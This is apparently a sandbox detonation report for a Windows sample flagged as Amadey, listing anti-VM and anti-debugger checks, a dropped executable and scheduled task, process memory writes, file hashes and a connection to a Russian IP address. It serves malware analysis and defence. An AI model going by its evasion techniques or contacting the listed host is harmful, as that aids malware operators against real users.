memory/2560-847-0x0000000001040000-0x0000000001511000-memory.dmp
memory/1848-846-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1680-843-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3296-849-0x0000000002020000-0x000000000268E000-memory.dmp
memory/1792-844-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3392-852-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-851-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-850-0x0000000000E80000-0x00000000014EE000-memory.dmp
memory/796-848-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1848-853-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3540-866-0x000000001B3A0000-0x000000001B682000-memory.dmp
memory/3540-867-0x0000000002410000-0x0000000002418000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-14 01:02
Reported
2024-05-14 01:04
Platform
win10v2004-20240508-en
Max time kernel
142s
Max time network
127s
Command Line
Signatures
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe
"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| US | 8.8.8.8:53 | 7.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/904-0-0x0000000000370000-0x0000000000841000-memory.dmp
memory/904-1-0x0000000077504000-0x0000000077506000-memory.dmp
memory/904-2-0x0000000000371000-0x000000000039F000-memory.dmp
memory/904-3-0x0000000000370000-0x0000000000841000-memory.dmp
memory/904-5-0x0000000000370000-0x0000000000841000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
| MD5 | 17ee93b40d1746f9d99cf8521a2ab566 |
| SHA1 | 371e878e7c8ff19a0f8771aefef9aeb6e28c2b87 |
| SHA256 | 49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468 |
| SHA512 | 21f8f6cf4d58775e4498bb1bb86437c30494d633da800ef3427bce4d7e4877018752fb091eb4627ccb0d14bc9f45afd199c752fceb1f4202d2b9d94efc6d01a7 |
memory/904-17-0x0000000000370000-0x0000000000841000-memory.dmp
memory/3144-18-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-20-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-19-0x00000000007D1000-0x00000000007FF000-memory.dmp
memory/3144-21-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-22-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-23-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-24-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-25-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-26-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-27-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/5016-29-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/5016-30-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/5016-31-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/5016-32-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-33-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-34-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-35-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-36-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-37-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-38-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/4972-40-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/4972-41-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-42-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-43-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-44-0x00000000007D0000-0x0000000000CA1000-memory.dmp
memory/3144-45-0x00000000007D0000-0x0000000000CA1000-memory.dmp